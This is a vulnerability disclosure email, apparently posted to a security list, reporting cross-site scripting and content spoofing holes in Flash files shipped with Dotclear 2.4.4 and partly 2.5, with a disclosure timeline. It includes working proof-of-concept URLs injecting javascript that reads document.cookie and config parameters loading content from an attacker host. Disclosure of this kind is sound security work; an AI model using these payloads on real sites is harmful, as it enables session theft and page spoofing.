Hello 3APA3A!
These are Cross-Site Scripting and Content Spoofing vulnerabilities in Dotclear.
CMS Dotclear has three vulnerable flash-files: swfupload.swf, player_flv.swf and player_mp3.swf.
File swfupload.swf it's Swfupload. I've wrote about vulnerabilities in Swfupload in November 2012 (http://securityvulns.ru/docs28759.html).
SecurityVulns ID: 12719
CVE: CVE-2012-3414
File player_flv.swf it's FLV Player. I've wrote about vulnerabilities in FLV Player in August 2011 (http://securityvulns.ru/docs26894.html).
SecurityVulns ID: 11877
File player_mp3.swf it's mp3 player similar to FLV Player (made by the same developer).
Vulnerable are Dotclear 2.4.4 (and partly 2.5) and previous versions.
In version Dotclear 2.5 the developers fixed vulnerabilities but not effectively: 1) all three vulnerable flash-files are exist in engine (so no need to take them from repository or from web sites for using in own projects, since these are vulnerable versions of flashes); 2) the developers changed swfupload.swf in Dotclear 2.5 on previous version, but this one is still vulnerable to all XSS and CS holes; 3) for of direct access to flash-files (via .htaccess), to prevent using of their vulnerabilities, works only in Apache, but not in other web servers (so web sites on them are vulnerable).
Cross-Site Scripting (WASC-08):
http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Cross-Site Scripting (WASC-08):
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml
File xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt
File xss.txt:
onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)
Code will execute after click. It's strictly social XSS.
Content Spoofing (WASC-12):
It's possible to inject text, images and html (e.g. for link injection).
http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3
2013.01.10 - announced at my site.
2013.01.14 - informed developers about vulnerabilities in all three flashes.
2013.03.16 - released Dotclear 2.5.
2013.04.10-12 - wrote 4 additional letters to developers with reminding, with drawing attention on ineffective fixing of the holes and with persuading them to fix the holes correctly.
2013.04.12 - disclosed at my site (http://websecurity.com.ua/6255/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua